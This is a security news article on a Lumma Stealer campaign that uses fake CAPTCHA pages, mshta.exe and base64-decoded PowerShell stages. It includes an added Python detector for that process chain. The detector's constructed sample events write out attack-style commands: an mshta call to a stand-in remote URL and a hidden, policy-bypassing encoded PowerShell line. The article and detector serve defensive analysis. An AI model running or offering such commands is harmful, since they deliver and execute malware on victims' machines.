In a recent discovery made by Netskope Threat Labs, a sophisticated global malware campaign was unveiled, showcasing the use of fake CAPTCHA pages to distribute the Lumma Stealer malware. Lumma Stealer, a malware-as-a-service (MaaS) tool that has been active since at least 2022, is designed to stealthily extract sensitive information from infected systems.
The scope of this campaign extends across various countries, including Argentina, Colombia, the United States, and the Philippines, with the most affected industry sector being telecommunications. Other industries targeted by this malicious campaign include healthcare, banking, and marketing.
The perpetrators behind this campaign utilize a range of delivery methods to deploy the Lumma Stealer malware, including cracked software, Discord’s Content Delivery Network (CDN), and fraudulent CAPTCHA pages. To avoid detection, the attackers employ advanced techniques such as process hollowing and PowerShell one-liners.
Further analysis conducted by researchers has uncovered new payloads, websites utilizing malvertising tactics, and the integration of open-source tools to circumvent security measures. The utilization of these tools and tactics illustrates the sophistication and adaptability of the malicious actors behind the Lumma Stealer campaign.
The infection chain begins when unsuspecting victims are redirected to a fake CAPTCHA page and instructed to perform specific actions outside the context of their web browser. This process involves tasks like opening the Windows Run dialog, pasting clipboard content, and executing it, which triggers the download and execution of malicious code on the victim’s machine.
By requiring user interaction outside the browser, this method effectively bypasses traditional browser-based cybersecurity defenses. The fake CAPTCHA mechanism leverages JavaScript to inject a malicious command into the clipboard, which then exploits the legitimate Windows tool mshta.exe to download and execute malicious files from remote servers.
The malicious payloads downloaded may appear as benign file types but contain malicious JavaScript snippets that use PowerShell to decode base64-encoded data and execute further stages of the malware. The second stage of this attack involves a complex obfuscated PowerShell script that performs various operations, ultimately leading to the execution of the final payload—a PE file containing the Lumma Stealer malware.
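The chain described above (Run dialog to mshta.exe fetching a remote URL, then PowerShell decoding base64 stages) leaves a distinctive parent/child pattern in process-creation telemetry. The following Python is an added example written for this article, not Netskope's code and not part of the original report; it runs detection logic over constructed process events shaped like Sysmon Event ID 1 or EDR records. The field names, process IDs, file paths and the `example.invalid` URL are all assumptions, and the decoded PowerShell fragment is a constructed sample that only mirrors the base64-decoding behaviour the text mentions.

```python
"""Detect the fake-CAPTCHA chain: explorer.exe -> mshta.exe <remote URL> -> powershell.exe
decoding base64. Constructed example; event schema and sample values are assumptions."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (hypothetical schema)."""
    pid: int
    parent_pid: int
    parent_image: str
    image: str
    command_line: str


# Indicators taken from the behaviour described in the article.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# -e / -ec / -en / -enc / -EncodedCommand followed by the base64 argument.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b\s+(\S+)", re.IGNORECASE)
B64_DECODE = re.compile(r"FromBase64String", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script (UTF-16LE base64) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except Exception:  # malformed base64 or text: treat as not encoded
        return None


def score_event(ev: ProcessEvent) -> list:
    """Findings for a single event, in the order they are evaluated."""
    findings = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    if img == "mshta.exe" and REMOTE_URL.search(cmd):
        findings.append("mshta_remote_url")
        if parent == "explorer.exe":  # typical parent when launched via the Run dialog
            findings.append("mshta_from_run_dialog")
    if img in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell_encoded_command")
            cmd = cmd + " " + decoded  # inspect the decoded script as well
        if B64_DECODE.search(cmd):
            findings.append("powershell_base64_decode")
        if parent == "mshta.exe":
            findings.append("powershell_child_of_mshta")
    return findings


def detect_chain(events):
    """Score every event and correlate mshta(remote URL) -> PowerShell(base64 decode).

    Returns (findings_by_pid, list of PowerShell pids completing the chain)."""
    by_pid = {ev.pid: ev for ev in events}
    findings = {ev.pid: score_event(ev) for ev in events}
    chain = []
    for ev in events:
        parent = by_pid.get(ev.parent_pid)
        if (parent is not None
                and "mshta_remote_url" in findings[parent.pid]
                and "powershell_base64_decode" in findings[ev.pid]):
            chain.append(ev.pid)
    return findings, chain


def sample_events():
    """Constructed telemetry: one malicious chain plus two benign look-alikes."""
    stage = "$b=[System.Convert]::FromBase64String($stage); <# constructed next stage #>"
    enc = base64.b64encode(stage.encode("utf-16-le")).decode("ascii")
    return [
        ProcessEvent(100, 1, r"C:\Windows\System32\userinit.exe", r"C:\Windows\Explorer.EXE",
                     "C:\\Windows\\Explorer.EXE"),
        ProcessEvent(200, 100, r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\mshta.exe",
                     "mshta https://cdn.example.invalid/captcha/verify"),
        ProcessEvent(300, 200, r"C:\Windows\System32\mshta.exe",
                     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     f"powershell.exe -w hidden -ep bypass -enc {enc}"),
        ProcessEvent(400, 100, r"C:\Windows\Explorer.EXE",
                     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "powershell.exe -NoProfile -Command Get-Date"),
        ProcessEvent(500, 100, r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\mshta.exe",
                     r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ]


if __name__ == "__main__":
    found, chain_pids = detect_chain(sample_events())
    for pid, f in found.items():
        print(pid, f)
    print("chain completed by pids:", chain_pids)
```

The benign events matter as much as the malicious one: a local `.hta` opened by mshta.exe and an interactive `Get-Date` both produce no findings, so the rule keys on the remote URL argument and the base64-decoding child rather than on the binaries alone. In a real pipeline the same correlation would be run over parent/child links from the EDR rather than from an in-memory list.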
To evade detection, the attackers employ techniques such as bypassing Windows Antimalware Scan Interface (AMSI) protections and utilizing tools like Babel for obfuscation. Additionally, the Lumma Stealer campaign has demonstrated adaptability by incorporating diverse delivery methods and evasion techniques, presenting significant challenges for cybersecurity defenses.
As this malicious campaign evolves within the MaaS ecosystem, the ability of the Lumma Stealer malware to exploit user interactions and abuse trusted system binaries underscores the importance of robust cybersecurity measures. The integration of application security into CI/CD workflows becomes crucial in countering such threats and enhancing overall defense capabilities against sophisticated malware attacks.